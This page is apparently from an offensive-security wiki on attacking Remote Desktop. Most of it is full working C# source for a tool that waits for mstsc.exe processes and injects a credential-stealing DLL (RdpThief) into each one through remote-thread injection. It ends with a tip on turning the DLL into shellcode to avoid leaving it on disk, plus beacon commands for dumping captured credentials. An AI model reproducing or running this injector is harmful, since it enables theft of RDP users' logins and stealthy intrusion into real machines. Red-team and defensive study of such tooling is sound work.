RDP
Remote Desktop Protocol

Some custom code that waits for mstsc.exe to be run and loads the malicious library into it:
RdpThiefInjector.cs
using System;
using System.Threading;
using System.Diagnostics;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace RdpThiefInjector
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
static void Main(string[] args)
{
string dllName = @"C:\Temp\RdpThief.dll";
HashSet<int> PIDs = new HashSet<int>();
Console.WriteLine("[*] Joined the hunt for mstsc.exe processes...");
while (true)
{
Process[] mstscProc = Process.GetProcessesByName("mstsc");
if (mstscProc.Length > 0)
{
for (int i = 0; i < mstscProc.Length; i++)
{
int processId = mstscProc[i].Id;
if (!PIDs.Contains(processId))
{
Console.WriteLine(quot;[+] Detected non-hooked process with PID={processId}");
IntPtr hProcess = OpenProcess(0x001F0FFF, false, processId);
IntPtr dllAddress = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
IntPtr outSize;
bool res = WriteProcessMemory(hProcess, dllAddress, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize);
if (res)
{
Console.WriteLine("[+] WriteProcessMemory succeeded!");
}
else
{
Console.WriteLine("[-] WriteProcessMemory failed :(");
}
IntPtr loadLibraryAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLibraryAddress, dllAddress, 0, IntPtr.Zero);
if (hThread != null)
{
Console.WriteLine("[+] CreateRemoteThread succeeded!");
Console.WriteLine(quot;[*] Process {processId} is now hooked, look for creds in \"{System.IO.Path.GetTempPath()}\"");
PIDs.Add(processId);
}
else
{
Console.WriteLine("[-] CreateRemoteThread failed :(");
}
}
}
}
Thread.Sleep(5000);
}
}
}
}
The DLL can be converted to shellcode with ConvertToShellcode.py (sRDI approach) and then be injected into the target process. That would help to avoid dropping the DLL to disk:
beacon> rdpthief_enable
beacon> rdpthief_dump
beacon> rdpthief_disable

Last modified 3mo ago
Copy link
On this page
RdpThief
Abusing CredSSP / TSPKG